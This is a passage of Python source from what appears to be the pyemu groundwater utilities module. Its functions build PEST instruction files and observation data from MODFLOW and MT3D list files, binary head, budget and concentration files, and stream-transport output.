else:
obsnme = "{0}_{1}_{2}".format(prefix, col, dt)
f.write(" w !{0}!".format(obsnme))
f.write("\n")
def apply_mtlist_budget_obs(
list_filename,
gw_filename="mtlist_gw.dat",
sw_filename="mtlist_sw.dat",
start_datetime="1-1-1970",
):
"""process an MT3D-USGS list file to extract mass budget entries.
Args:
list_filename (`str`): the path and name of an existing MT3D-USGS list file
gw_filename (`str`, optional): the name of the output file with gw mass
budget information. Default is "mtlist_gw.dat"
sw_filename (`str`): the name of the output file with sw mass budget information.
Default is "mtlist_sw.dat"
start_datatime (`str`): an str that can be cast to a pandas.TimeStamp. Used to give
observations a meaningful name
Returns:
2-element tuple containing
- **pandas.DataFrame**: the gw mass budget dataframe
- **pandas.DataFrame**: (optional) the sw mass budget dataframe.
If the SFT process is not active, this returned value is `None`.
Note:
This is the companion function of `gw_utils.setup_mtlist_budget_obs()`.
"""
try:
import flopy
except Exception as e:
raise Exception("error import flopy: {0}".format(str(e)))
mt = flopy.utils.MtListBudget(list_filename)
gw, sw = mt.parse(start_datetime=start_datetime, diff=True)
gw = gw.drop(
[
col
for col in gw.columns
for drop_col in ["kper", "kstp", "tkstp"]
if (col.lower().startswith(drop_col))
],
axis=1,
)
gw.to_csv(gw_filename, sep=" ", index_label="datetime", date_format="%Y%m%d")
if sw is not None:
sw = sw.drop(
[
col
for col in sw.columns
for drop_col in ["kper", "kstp", "tkstp"]
if (col.lower().startswith(drop_col))
],
axis=1,
)
sw.to_csv(sw_filename, sep=" ", index_label="datetime", date_format="%Y%m%d")
return gw, sw
def setup_mflist_budget_obs(
list_filename,
flx_filename="flux.dat",
vol_filename="vol.dat",
start_datetime="1-1'1970",
prefix="",
save_setup_file=False,
specify_times=None,
):
"""setup observations of budget volume and flux from modflow list file.
Args:
list_filename (`str`): path and name of the existing modflow list file
flx_filename (`str`, optional): output filename that will contain the budget flux
observations. Default is "flux.dat"
vol_filename (`str`, optional): output filename that will contain the budget volume
observations. Default is "vol.dat"
start_datetime (`str`, optional): a string that can be parsed into a pandas.TimeStamp.
This is used to give budget observations meaningful names. Default is "1-1-1970".
prefix (`str`, optional): a prefix to add to the water budget observations. Useful if
processing more than one list file as part of the forward run process. Default is ''.
save_setup_file (`bool`): a flag to save "_setup_"+ `list_filename` +".csv" file that contains useful
control file information
specify_times (`np.ndarray`-like, optional): An array of times to
extract from the budget dataframes returned by the flopy
MfListBudget(list_filename).get_dataframe() method. This can be
useful to ensure consistent observation times for PEST.
Array needs to be alignable with index of dataframe
return by flopy method, care should be take to ensure that
this is the case. If passed will be written to
"budget_times.config" file as strings to be read by the companion
`apply_mflist_budget_obs()` method at run time.
Returns:
**pandas.DataFrame**: a dataframe with information for constructing a control file.
Note:
This method writes instruction files and also a _setup_.csv to use when constructing a pest
control file. The instruction files are named <flux_file>.ins and <vol_file>.ins, respectively
It is recommended to use the default values for flux_file and vol_file.
This is the companion function of `gw_utils.apply_mflist_budget_obs()`.
"""
flx, vol = apply_mflist_budget_obs(
list_filename, flx_filename, vol_filename, start_datetime, times=specify_times
)
_write_mflist_ins(flx_filename + ".ins", flx, prefix + "flx")
_write_mflist_ins(vol_filename + ".ins", vol, prefix + "vol")
df = try_process_output_file(flx_filename + ".ins")
if df is None:
raise Exception("error processing flux instruction file")
df2 = try_process_output_file(vol_filename + ".ins")
if df2 is None:
raise Exception("error processing volume instruction file")
df = df.append(df2)
df.loc[:, "obsnme"] = df.index.values
if save_setup_file:
df.to_csv("_setup_" + os.path.split(list_filename)[-1] + ".csv", index=False)
if specify_times is not None:
np.savetxt(
os.path.join(os.path.dirname(flx_filename), "budget_times.config"),
specify_times,
fmt="%s",
)
return df
def apply_mflist_budget_obs(
list_filename,
flx_filename="flux.dat",
vol_filename="vol.dat",
start_datetime="1-1-1970",
times=None,
):
"""process a MODFLOW list file to extract flux and volume water budget
entries.
Args:
list_filename (`str`): path and name of the existing modflow list file
flx_filename (`str`, optional): output filename that will contain the
budget flux observations. Default is "flux.dat"
vol_filename (`str`, optional): output filename that will contain the
budget volume observations. Default is "vol.dat"
start_datetime (`str`, optional): a string that can be parsed into a
pandas.TimeStamp. This is used to give budget observations
meaningful names. Default is "1-1-1970".
times (`np.ndarray`-like or `str`, optional): An array of times to
extract from the budget dataframes returned by the flopy
MfListBudget(list_filename).get_dataframe() method. This can be
useful to ensure consistent observation times for PEST.
If type `str`, will assume `times=filename` and attempt to read
single vector (no header or index) from file, parsing datetime
using pandas. Array needs to be alignable with index of dataframe
return by flopy method, care should be take to ensure that
this is the case. If setup with `setup_mflist_budget_obs()`
specifying `specify_times` argument `times` should be set to
"budget_times.config".
Note:
This is the companion function of `gw_utils.setup_mflist_budget_obs()`.
Returns:
tuple containing
- **pandas.DataFrame**: a dataframe with flux budget information
- **pandas.DataFrame**: a dataframe with cumulative budget information
"""
try:
import flopy
except Exception as e:
raise Exception("error import flopy: {0}".format(str(e)))
mlf = flopy.utils.MfListBudget(list_filename)
flx, vol = mlf.get_dataframes(start_datetime=start_datetime, diff=True)
if times is not None:
if isinstance(times, str):
if vol.index.tzinfo:
parse_date = {"t": [0]}
names = [None]
else:
parse_date = False
names = ["t"]
times = pd.read_csv(
times, header=None, names=names, parse_dates=parse_date
)["t"].values
flx = flx.loc[times]
vol = vol.loc[times]
flx.to_csv(flx_filename, sep=" ", index_label="datetime", date_format="%Y%m%d")
vol.to_csv(vol_filename, sep=" ", index_label="datetime", date_format="%Y%m%d")
return flx, vol
def _write_mflist_ins(ins_filename, df, prefix):
"""write an instruction file for a MODFLOW list file"""
dt_str = df.index.map(lambda x: x.strftime("%Y%m%d"))
with open(ins_filename, "w") as f:
f.write("pif ~\nl1\n")
for dt in dt_str:
f.write("l1 ")
for col in df.columns:
obsnme = "{0}_{1}_{2}".format(prefix, col, dt)
f.write(" w !{0}!".format(obsnme))
f.write("\n")
def setup_hds_timeseries(
bin_file,
kij_dict,
prefix=None,
include_path=False,
model=None,
postprocess_inact=None,
text=None,
fill=None,
precision="single",
):
"""a function to setup a forward process to extract time-series style values
from a binary modflow binary file (or equivalent format - hds, ucn, sub, cbb, etc).
Args:
bin_file (`str`): path and name of existing modflow binary file - headsave, cell budget and MT3D UCN supported.
kij_dict (`dict`): dictionary of site_name: [k,i,j] pairs. For example: `{"wel1":[0,1,1]}`.
prefix (`str`, optional): string to prepend to site_name when forming observation names. Default is None
include_path (`bool`, optional): flag to setup the binary file processing in directory where the hds_file
is located (if different from where python is running). This is useful for setting up
the process in separate directory for where python is running.
model (`flopy.mbase`, optional): a `flopy.basemodel` instance. If passed, the observation names will
have the datetime of the observation appended to them (using the flopy `start_datetime` attribute.
If None, the observation names will have the zero-based stress period appended to them. Default is None.
postprocess_inact (`float`, optional): Inactive value in heads/ucn file e.g. mt.btn.cinit. If `None`, no
inactive value processing happens. Default is `None`.
text (`str`): the text record entry in the binary file (e.g. "constant_head").
Used to indicate that the binary file is a MODFLOW cell-by-cell budget file.
If None, headsave or MT3D unformatted concentration file
is assummed. Default is None
fill (`float`): fill value for NaNs in the extracted timeseries dataframe. If
`None`, no filling is done, which may yield model run failures as the resulting
processed timeseries CSV file (produced at runtime) may have missing values and
can't be processed with the cooresponding instruction file. Default is `None`.
precision (`str`): the precision of the binary file. Can be "single" or "double".
Default is "single".
Returns:
tuple containing
- **str**: the forward run command to execute the binary file process during model runs.
- **pandas.DataFrame**: a dataframe of observation information for use in the pest control file
Note:
This function writes hds_timeseries.config that must be in the same
dir where `apply_hds_timeseries()` is called during the forward run
Assumes model time units are days
This is the companion function of `gw_utils.apply_hds_timeseries()`.
"""
try:
import flopy
except Exception as e:
print("error importing flopy, returning {0}".format(str(e)))
return
assert os.path.exists(bin_file), "binary file not found"
iscbc = False
if text is not None:
text = text.upper()
try:
# hack: if model is passed and its None, it trips up CellBudgetFile...
if model is not None:
bf = flopy.utils.CellBudgetFile(
bin_file, precision=precision, model=model
)
iscbc = True
else:
bf = flopy.utils.CellBudgetFile(bin_file, precision=precision)
iscbc = True
except Exception as e:
try:
if model is not None:
bf = flopy.utils.HeadFile(
bin_file, precision=precision, model=model, text=text
)
else:
bf = flopy.utils.HeadFile(bin_file, precision=precision, text=text)
except Exception as e1:
raise Exception(
"error instantiating binary file as either CellBudgetFile:{0} or as HeadFile with text arg: {1}".format(
str(e), str(e1)
)
)
if iscbc:
tl = [t.decode().strip() for t in bf.textlist]
if text not in tl:
raise Exception(
"'text' {0} not found in CellBudgetFile.textlist:{1}".format(
text, tl
)
)
elif bin_file.lower().endswith(".ucn"):
try:
bf = flopy.utils.UcnFile(bin_file, precision=precision)
except Exception as e:
raise Exception("error instantiating UcnFile:{0}".format(str(e)))
else:
try:
bf = flopy.utils.HeadFile(bin_file, precision=precision)
except Exception as e:
raise Exception("error instantiating HeadFile:{0}".format(str(e)))
if text is None:
text = "none"
nlay, nrow, ncol = bf.nlay, bf.nrow, bf.ncol
# if include_path:
# pth = os.path.join(*[p for p in os.path.split(hds_file)[:-1]])
# config_file = os.path.join(pth,"{0}_timeseries.config".format(hds_file))
# else:
config_file = "{0}_timeseries.config".format(bin_file)
print("writing config file to {0}".format(config_file))
if fill is None:
fill = "none"
f_config = open(config_file, "w")
if model is not None:
if model.dis.itmuni != 4:
warnings.warn(
"setup_hds_timeseries only supports 'days' time units...", PyemuWarning
)
f_config.write(
"{0},{1},d,{2},{3},{4},{5}\n".format(
os.path.split(bin_file)[-1],
model.start_datetime,
text,
fill,
precision,
iscbc,
)
)
start = pd.to_datetime(model.start_datetime)
else:
f_config.write(
"{0},none,none,{1},{2},{3},{4}\n".format(
os.path.split(bin_file)[-1], text, fill, precision, iscbc
)
)
f_config.write("site,k,i,j\n")
dfs = []
for site, (k, i, j) in kij_dict.items():
assert k >= 0 and k < nlay, k
assert i >= 0 and i < nrow, i
assert j >= 0 and j < ncol, j
site = site.lower().replace(" ", "")
if iscbc:
ts = bf.get_ts((k, i, j), text=text)
# print(ts)
df = pd.DataFrame(data=ts, columns=["totim", site])
else:
df = pd.DataFrame(data=bf.get_ts((k, i, j)), columns=["totim", site])
if model is not None:
dts = start + pd.to_timedelta(df.totim, unit="d")
df.loc[:, "totim"] = dts
# print(df)
f_config.write("{0},{1},{2},{3}\n".format(site, k, i, j))
df.index = df.pop("totim")
dfs.append(df)
f_config.close()
df = pd.concat(dfs, axis=1).T
df.to_csv(bin_file + "_timeseries.processed", sep=" ")
if model is not None:
t_str = df.columns.map(lambda x: x.strftime("%Y%m%d"))
else:
t_str = df.columns.map(lambda x: "{0:08.2f}".format(x))
ins_file = bin_file + "_timeseries.processed.ins"
print("writing instruction file to {0}".format(ins_file))
with open(ins_file, "w") as f:
f.write("pif ~\n")
f.write("l1 \n")
for site in df.index:
# for t in t_str:
f.write("l1 w ")
# for site in df.columns:
for t in t_str:
if prefix is not None:
obsnme = "{0}_{1}_{2}".format(prefix, site, t)
else:
obsnme = "{0}_{1}".format(site, t)
f.write(" !{0}!".format(obsnme))
f.write("\n")
if postprocess_inact is not None:
_setup_postprocess_hds_timeseries(
bin_file, df, config_file, prefix=prefix, model=model
)
bd = "."
if include_path:
bd = os.getcwd()
pth = os.path.join(*[p for p in os.path.split(bin_file)[:-1]])
os.chdir(pth)
config_file = os.path.split(config_file)[-1]
try:
df = apply_hds_timeseries(config_file, postprocess_inact=postprocess_inact)
except Exception as e:
os.chdir(bd)
raise Exception("error in apply_hds_timeseries(): {0}".format(str(e)))
os.chdir(bd)
df = try_process_output_file(ins_file)
if df is None:
raise Exception("error processing {0} instruction file".format(ins_file))
df.loc[:, "weight"] = 0.0
if prefix is not None:
df.loc[:, "obgnme"] = df.index.map(lambda x: "_".join(x.split("_")[:2]))
else:
df.loc[:, "obgnme"] = df.index.map(lambda x: x.split("_")[0])
frun_line = "pyemu.gw_utils.apply_hds_timeseries('{0}',{1})\n".format(
config_file, postprocess_inact
)
return frun_line, df
def apply_hds_timeseries(config_file=None, postprocess_inact=None):
"""process a modflow binary file using a previously written
configuration file
Args:
config_file (`str`, optional): configuration file written by `pyemu.gw_utils.setup_hds_timeseries`.
If `None`, looks for `hds_timeseries.config`
postprocess_inact (`float`, optional): Inactive value in heads/ucn file e.g. mt.btn.cinit. If `None`, no
inactive value processing happens. Default is `None`.
Note:
This is the companion function of `gw_utils.setup_hds_timeseries()`.
"""
import flopy
if config_file is None:
config_file = "hds_timeseries.config"
assert os.path.exists(config_file), config_file
with open(config_file, "r") as f:
line = f.readline()
(
bf_file,
start_datetime,
time_units,
text,
fill,
precision,
_iscbc,
) = line.strip().split(",")
if len(line.strip().split(",")) == 6:
(
bf_file,
start_datetime,
time_units,
text,
fill,
precision,
) = line.strip().split(",")
_iscbc = "false"
else:
(
bf_file,
start_datetime,
time_units,
text,
fill,
precision,
_iscbc,
) = line.strip().split(",")
site_df = pd.read_csv(f)
text = text.upper()
if _iscbc.lower().strip() == "false":
iscbc = False
elif _iscbc.lower().strip() == "true":
iscbc = True
else:
raise Exception(
"apply_hds_timeseries() error: unrecognized 'iscbc' string in config file: {0}".format(
_iscbc
)
)
assert os.path.exists(bf_file), "head save file not found"
if iscbc:
try:
bf = flopy.utils.CellBudgetFile(bf_file, precision=precision)
except Exception as e:
raise Exception("error instantiating CellBudgetFile:{0}".format(str(e)))
elif bf_file.lower().endswith(".ucn"):
try:
bf = flopy.utils.UcnFile(bf_file, precision=precision)
except Exception as e:
raise Exception("error instantiating UcnFile:{0}".format(str(e)))
else:
try:
if text != "NONE":
bf = flopy.utils.HeadFile(bf_file, text=text, precision=precision)
else:
bf = flopy.utils.HeadFile(bf_file, precision=precision)
except Exception as e:
raise Exception("error instantiating HeadFile:{0}".format(str(e)))
nlay, nrow, ncol = bf.nlay, bf.nrow, bf.ncol
dfs = []
for site, k, i, j in zip(site_df.site, site_df.k, site_df.i, site_df.j):
assert k >= 0 and k < nlay
assert i >= 0 and i < nrow
assert j >= 0 and j < ncol
if iscbc:
df = pd.DataFrame(
data=bf.get_ts((k, i, j), text=text), columns=["totim", site]
)
else:
df = pd.DataFrame(data=bf.get_ts((k, i, j)), columns=["totim", site])
df.index = df.pop("totim")
dfs.append(df)
df = pd.concat(dfs, axis=1).T
if df.shape != df.dropna().shape:
warnings.warn("NANs in processed timeseries file", PyemuWarning)
if fill.upper() != "NONE":
fill = float(fill)
df.fillna(fill, inplace=True)
# print(df)
df.to_csv(bf_file + "_timeseries.processed", sep=" ")
if postprocess_inact is not None:
_apply_postprocess_hds_timeseries(config_file, postprocess_inact)
return df
def _setup_postprocess_hds_timeseries(
hds_file, df, config_file, prefix=None, model=None
):
"""Dirty function to setup post processing concentrations in inactive/dry cells"""
warnings.warn(
"Setting up post processing of hds or ucn timeseries obs. "
"Prepending 'pp' to obs name may cause length to exceed 20 chars",
PyemuWarning,
)
if model is not None:
t_str = df.columns.map(lambda x: x.strftime("%Y%m%d"))
else:
t_str = df.columns.map(lambda x: "{0:08.2f}".format(x))
if prefix is not None:
prefix = "pp{0}".format(prefix)
else:
prefix = "pp"
ins_file = hds_file + "_timeseries.post_processed.ins"
print("writing instruction file to {0}".format(ins_file))
with open(ins_file, "w") as f:
f.write("pif ~\n")
f.write("l1 \n")
for site in df.index:
f.write("l1 w ")
# for site in df.columns:
for t in t_str:
obsnme = "{0}{1}_{2}".format(prefix, site, t)
f.write(" !{0}!".format(obsnme))
f.write("\n")
frun_line = "pyemu.gw_utils._apply_postprocess_hds_timeseries('{0}')\n".format(
config_file
)
return frun_line
def _apply_postprocess_hds_timeseries(config_file=None, cinact=1e30):
"""private function to post processing binary files"""
import flopy
if config_file is None:
config_file = "hds_timeseries.config"
assert os.path.exists(config_file), config_file
with open(config_file, "r") as f:
line = f.readline()
(
hds_file,
start_datetime,
time_units,
text,
fill,
precision,
_iscbc,
) = line.strip().split(",")
if len(line.strip().split(",")) == 6:
(
hds_file,
start_datetime,
time_units,
text,
fill,
precision,
) = line.strip().split(",")
_iscbc = "false"
else:
(
hds_file,
start_datetime,
time_units,
text,
fill,
precision,
_iscbc,
) = line.strip().split(",")
site_df = pd.read_csv(f)
# print(site_df)
text = text.upper()
assert os.path.exists(hds_file), "head save file not found"
if hds_file.lower().endswith(".ucn"):
try:
hds = flopy.utils.UcnFile(hds_file, precision=precision)
except Exception as e:
raise Exception("error instantiating UcnFile:{0}".format(str(e)))
else:
try:
if text != "NONE":
hds = flopy.utils.HeadFile(hds_file, text=text, precision=precision)
else:
hds = flopy.utils.HeadFile(hds_file, precision=precision)
except Exception as e:
raise Exception("error instantiating HeadFile:{0}".format(str(e)))
nlay, nrow, ncol = hds.nlay, hds.nrow, hds.ncol
dfs = []
for site, k, i, j in zip(site_df.site, site_df.k, site_df.i, site_df.j):
assert k >= 0 and k < nlay
assert i >= 0 and i < nrow
assert j >= 0 and j < ncol
if text.upper() != "NONE":
df = pd.DataFrame(data=hds.get_ts((k, i, j)), columns=["totim", site])
else:
df = pd.DataFrame(data=hds.get_ts((k, i, j)), columns=["totim", site])
df.index = df.pop("totim")
inact_obs = df[site].apply(lambda x: np.isclose(x, cinact))
if inact_obs.sum() > 0:
assert k + 1 < nlay, "Inactive observation in lowest layer"
df_lower = pd.DataFrame(
data=hds.get_ts((k + 1, i, j)), columns=["totim", site]
)
df_lower.index = df_lower.pop("totim")
df.loc[inact_obs] = df_lower.loc[inact_obs]
print(
"{0} observation(s) post-processed for site {1} at kij ({2},{3},{4})".format(
inact_obs.sum(), site, k, i, j
)
)
dfs.append(df)
df = pd.concat(dfs, axis=1).T
# print(df)
df.to_csv(hds_file + "_timeseries.post_processed", sep=" ")
return df
def setup_hds_obs(
hds_file,
kperk_pairs=None,
skip=None,
prefix="hds",
text="head",
precision="single",
include_path=False,
):
"""a function to setup using all values from a layer-stress period
pair for observations.
Args:
hds_file (`str`): path and name of an existing MODFLOW head-save file.
If the hds_file endswith 'ucn', then the file is treated as a UcnFile type.
kperk_pairs ([(int,int)]): a list of len two tuples which are pairs of kper
(zero-based stress period index) and k (zero-based layer index) to
setup observations for. If None, then all layers and stress period records
found in the file will be used. Caution: a shit-ton of observations may be produced!
skip (variable, optional): a value or function used to determine which values
to skip when setting up observations. If np.scalar(skip)
is True, then values equal to skip will not be used.
If skip can also be a np.ndarry with dimensions equal to the model.
Observations are set up only for cells with Non-zero values in the array.
If not np.ndarray or np.scalar(skip), then skip will be treated as a lambda function that
returns np.NaN if the value should be skipped.
prefix (`str`): the prefix to use for the observation names. default is "hds".
text (`str`): the text tag the flopy HeadFile instance. Default is "head"
precison (`str`): the precision string for the flopy HeadFile instance. Default is "single"
include_path (`bool`, optional): flag to setup the binary file processing in directory where the hds_file
is located (if different from where python is running). This is useful for setting up
the process in separate directory for where python is running.
Returns:
tuple containing
- **str**: the forward run script line needed to execute the headsave file observation
operation
- **pandas.DataFrame**: a dataframe of pest control file information
Note:
Writes an instruction file and a _setup_ csv used construct a control file.
This is the companion function to `gw_utils.apply_hds_obs()`.
"""
try:
import flopy
except Exception as e:
print("error importing flopy, returning {0}".format(str(e)))
return
assert os.path.exists(hds_file), "head save file not found"
if hds_file.lower().endswith(".ucn"):
try:
hds = flopy.utils.UcnFile(hds_file)
except Exception as e:
raise Exception("error instantiating UcnFile:{0}".format(str(e)))
elif text.lower() == "headu":
try:
hds = flopy.utils.HeadUFile(hds_file, text=text, precision=precision)
except Exception as e:
raise Exception("error instantiating HeadFile:{0}".format(str(e)))
else:
try:
hds = flopy.utils.HeadFile(hds_file, text=text, precision=precision)
except Exception as e:
raise Exception("error instantiating HeadFile:{0}".format(str(e)))
if kperk_pairs is None:
kperk_pairs = []
for kstp, kper in hds.kstpkper:
kperk_pairs.extend([(kper - 1, k) for k in range(hds.nlay)])
if len(kperk_pairs) == 2:
try:
if len(kperk_pairs[0]) == 2:
pass
except:
kperk_pairs = [kperk_pairs]
# if start_datetime is not None:
# start_datetime = pd.to_datetime(start_datetime)
# dts = start_datetime + pd.to_timedelta(hds.times,unit='d')
data = {}
kpers = [kper - 1 for kstp, kper in hds.kstpkper]
for kperk_pair in kperk_pairs:
kper, k = kperk_pair
assert kper in kpers, "kper not in hds:{0}".format(kper)
assert k in range(hds.nlay), "k not in hds:{0}".format(k)
kstp = last_kstp_from_kper(hds, kper)
d = hds.get_data(kstpkper=(kstp, kper))[k]
data["{0}_{1}".format(kper, k)] = d.flatten()
# data[(kper,k)] = d.flatten()
idx, iidx, jidx = [], [], []
for _ in range(len(data)):
for i in range(hds.nrow):
iidx.extend([i for _ in range(hds.ncol)])
jidx.extend([j for j in range(hds.ncol)])
idx.extend(["i{0:04d}_j{1:04d}".format(i, j) for j in range(hds.ncol)])
idx = idx[: hds.nrow * hds.ncol]
df = pd.DataFrame(data, index=idx)
data_cols = list(df.columns)
data_cols.sort()
# df.loc[:,"iidx"] = iidx
# df.loc[:,"jidx"] = jidx
if skip is not None:
for col in data_cols:
if np.isscalar(skip):
df.loc[df.loc[:, col] == skip, col] = np.NaN
elif isinstance(skip, np.ndarray):
assert (
skip.ndim >= 2
), "skip passed as {}D array, At least 2D (<= 4D) array required".format(
skip.ndim
)
assert skip.shape[-2:] == (
hds.nrow,
hds.ncol,
), "Array dimensions of arg. skip needs to match model dimensions ({0},{1}). ({2},{3}) passed".format(
hds.nrow, hds.ncol, skip.shape[-2], skip.shape[-1]
)
if skip.ndim == 2:
print(
"2D array passed for skip, assuming constant for all layers and kper"
)
skip = np.tile(skip, (len(kpers), hds.nlay, 1, 1))
if skip.ndim == 3:
print("3D array passed for skip, assuming constant for all kper")
skip = np.tile(skip, (len(kpers), 1, 1, 1))
kper, k = [int(c) for c in col.split("_")]
df.loc[
df.index.map(
lambda x: skip[
kper,
k,
int(x.split("_")[0].strip("i")),
int(x.split("_")[1].strip("j")),
]
== 0
),
col,
] = np.NaN
else:
df.loc[:, col] = df.loc[:, col].apply(skip)
# melt to long form
df = df.melt(var_name="kperk", value_name="obsval")
# set row and col identifies
df.loc[:, "iidx"] = iidx
df.loc[:, "jidx"] = jidx
# drop nans from skip
df = df.dropna()
# set some additional identifiers
df.loc[:, "kper"] = df.kperk.apply(lambda x: int(x.split("_")[0]))
df.loc[:, "kidx"] = df.pop("kperk").apply(lambda x: int(x.split("_")[1]))
# form obs names
# def get_kper_str(kper):
# if start_datetime is not None:
# return dts[int(kper)].strftime("%Y%m%d")
# else:
# return "kper{0:04.0f}".format(kper)
fmt = prefix + "_{0:02.0f}_{1:03.0f}_{2:03.0f}_{3:03.0f}"
# df.loc[:,"obsnme"] = df.apply(lambda x: fmt.format(x.kidx,x.iidx,x.jidx,
# get_kper_str(x.kper)),axis=1)
df.loc[:, "obsnme"] = df.apply(
lambda x: fmt.format(x.kidx, x.iidx, x.jidx, x.kper), axis=1
)
df.loc[:, "ins_str"] = df.obsnme.apply(lambda x: "l1 w !{0}!".format(x))
df.loc[:, "obgnme"] = prefix
# write the instruction file
with open(hds_file + ".dat.ins", "w") as f:
f.write("pif ~\nl1\n")
df.ins_str.to_string(f, index=False, header=False)
# write the corresponding output file
df.loc[:, ["obsnme", "obsval"]].to_csv(hds_file + ".dat", sep=" ", index=False)
hds_path = os.path.dirname(hds_file)
setup_file = os.path.join(
hds_path, "_setup_{0}.csv".format(os.path.split(hds_file)[-1])
)
df.to_csv(setup_file)
if not include_path:
hds_file = os.path.split(hds_file)[-1]
fwd_run_line = (
"pyemu.gw_utils.apply_hds_obs('{0}',precision='{1}',text='{2}')\n".format(
hds_file, precision, text
)
)
df.index = df.obsnme
return fwd_run_line, df
def last_kstp_from_kper(hds, kper):
"""function to find the last time step (kstp) for a
give stress period (kper) in a modflow head save file.
Args:
hds (`flopy.utils.HeadFile`): head save file
kper (`int`): the zero-index stress period number
Returns:
**int**: the zero-based last time step during stress period
kper in the head save file
"""
# find the last kstp with this kper
kstp = -1
for kkstp, kkper in hds.kstpkper:
if kkper == kper + 1 and kkstp > kstp:
kstp = kkstp
if kstp == -1:
raise Exception("kstp not found for kper {0}".format(kper))
kstp -= 1
return kstp
def apply_hds_obs(hds_file, inact_abs_val=1.0e20, precision="single", text="head"):
"""process a modflow head save file. A companion function to
`gw_utils.setup_hds_obs()` that is called during the forward run process
Args:
hds_file (`str`): a modflow head save filename. if hds_file ends with 'ucn',
then the file is treated as a UcnFile type.
inact_abs_val (`float`, optional): the value that marks the mininum and maximum
active value. values in the headsave file greater than `inact_abs_val` or less
than -`inact_abs_val` are reset to `inact_abs_val`
Returns:
**pandas.DataFrame**: a dataframe with extracted simulated values.
Note:
This is the companion function to `gw_utils.setup_hds_obs()`.
"""
try:
import flopy
except Exception as e:
raise Exception("apply_hds_obs(): error importing flopy: {0}".format(str(e)))
from .. import pst_utils
assert os.path.exists(hds_file)
out_file = hds_file + ".dat"
ins_file = out_file + ".ins"
assert os.path.exists(ins_file)
df = pd.DataFrame({"obsnme": pst_utils.parse_ins_file(ins_file)})
df.index = df.obsnme
# populate metdata
items = ["k", "i", "j", "kper"]
for i, item in enumerate(items):
df.loc[:, item] = df.obsnme.apply(lambda x: int(x.split("_")[i + 1]))
if hds_file.lower().endswith("ucn"):
hds = flopy.utils.UcnFile(hds_file)
elif text.lower() == "headu":
hds = flopy.utils.HeadUFile(hds_file)
else:
hds = flopy.utils.HeadFile(hds_file, precision=precision, text=text)
kpers = df.kper.unique()
df.loc[:, "obsval"] = np.NaN
for kper in kpers:
kstp = last_kstp_from_kper(hds, kper)
data = hds.get_data(kstpkper=(kstp, kper))
# jwhite 15jan2018 fix for really large values that are getting some
# trash added to them...
if text.lower() != "headu":
data[np.isnan(data)] = 0.0
data[data > np.abs(inact_abs_val)] = np.abs(inact_abs_val)
data[data < -np.abs(inact_abs_val)] = -np.abs(inact_abs_val)
df_kper = df.loc[df.kper == kper, :]
df.loc[df_kper.index, "obsval"] = data[df_kper.k, df_kper.i, df_kper.j]
else:
df_kper = df.loc[df.kper == kper, :]
for k, d in enumerate(data):
d[np.isnan(d)] = 0.0
d[d > np.abs(inact_abs_val)] = np.abs(inact_abs_val)
d[d < -np.abs(inact_abs_val)] = -np.abs(inact_abs_val)
df_kperk = df_kper.loc[df_kper.k == k, :]
df.loc[df_kperk.index, "obsval"] = d[df_kperk.i]
assert df.dropna().shape[0] == df.shape[0]
df.loc[:, ["obsnme", "obsval"]].to_csv(out_file, index=False, sep=" ")
return df
def setup_sft_obs(sft_file, ins_file=None, start_datetime=None, times=None, ncomp=1):
"""writes a post-processor and instruction file for a mt3d-usgs sft output file
Args:
sft_file (`str`): path and name of an existing sft output file (ASCII)
ins_file (`str`, optional): the name of the instruction file to create.
If None, the name is `sft_file`+".ins". Default is `None`.
start_datetime (`str`): a pandas.to_datetime() compatible str. If not None,
then the resulting observation names have the datetime
suffix. If None, the suffix is the output totim. Default
is `None`.
times ([`float`]): a list of times to make observations for. If None, all times
found in the file are used. Default is None.
ncomp (`int`): number of components in transport model. Default is 1.
Returns:
**pandas.DataFrame**: a dataframe with observation names and values for the sft simulated
concentrations.
Note:
This is the companion function to `gw_utils.apply_sft_obs()`.
"""
df = pd.read_csv(sft_file, skiprows=1, delim_whitespace=True)
df.columns = [c.lower().replace("-", "_") for c in df.columns]
if times is None:
times = df.time.unique()
missing = []
utimes = df.time.unique()
for t in times:
if t not in utimes:
missing.append(str(t))
if len(missing) > 0:
print(df.time)
raise Exception("the following times are missing:{0}".format(",".join(missing)))
with open("sft_obs.config", "w") as f:
f.write(sft_file + "\n")
[f.write("{0:15.6E}\n".format(t)) for t in times]
df = apply_sft_obs()
utimes = df.time.unique()
for t in times:
assert t in utimes, "time {0} missing in processed dataframe".format(t)
idx = df.time.apply(lambda x: x in times)
if start_datetime is not None:
start_datetime = pd.to_datetime(start_datetime)
df.loc[:, "time_str"] = pd.to_timedelta(df.time, unit="d") + start_datetime
df.loc[:, "time_str"] = df.time_str.apply(
lambda x: datetime.strftime(x, "%Y%m%d")
)
else:
df.loc[:, "time_str"] = df.time.apply(lambda x: "{0:08.2f}".format(x))
df.loc[:, "ins_str"] = "l1\n"
# check for multiple components
df_times = df.loc[idx, :]
df.loc[:, "icomp"] = 1
icomp_idx = list(df.columns).index("icomp")
for t in times:
df_time = df.loc[df.time == t, :].copy()
vc = df_time.sfr_node.value_counts()
ncomp = vc.max()
assert np.all(vc.values == ncomp)
nstrm = df_time.shape[0] / ncomp
for icomp in range(ncomp):
s = int(nstrm * (icomp))
e = int(nstrm * (icomp + 1))
idxs = df_time.iloc[s:e, :].index
# df_time.iloc[nstrm*(icomp):nstrm*(icomp+1),icomp_idx.loc["icomp"] = int(icomp+1)
df_time.loc[idxs, "icomp"] = int(icomp + 1)
# df.loc[df_time.index,"ins_str"] = df_time.apply(lambda x: "l1 w w !sfrc{0}_{1}_{2}! !swgw{0}_{1}_{2}! !gwcn{0}_{1}_{2}!\n".\
# format(x.sfr_node,x.icomp,x.time_str),axis=1)
df.loc[df_time.index, "ins_str"] = df_time.apply(
lambda x: "l1 w w !sfrc{0}_{1}_{2}!\n".format(
x.sfr_node, x.icomp, x.time_str
),
axis=1,
)
df.index = np.arange(df.shape[0])
if ins_file is None:
ins_file = sft_file + ".processed.ins"
with open(ins_file, "w") as f:
f.write("pif ~\nl1\n")
[f.write(i) for i in df.ins_str]
# df = try_process_ins_file(ins_file,sft_file+".processed")
df = try_process_output_file(ins_file, sft_file + ".processed")
return df
def apply_sft_obs():
"""process an mt3d-usgs sft ASCII output file using a previous-written
config file
Returns:
**pandas.DataFrame**: a dataframe of extracted simulated outputs
Note:
This is the companion function to `gw_utils.setup_sft_obs()`.
"""
# this is for dealing with the missing 'e' problem
def try_cast(x):
try:
return float(x)
except:
return 0.0
times = []
with open("sft_obs.config") as f:
sft_file = f.readline().strip()
for line in f:
times.append(float(line.strip()))
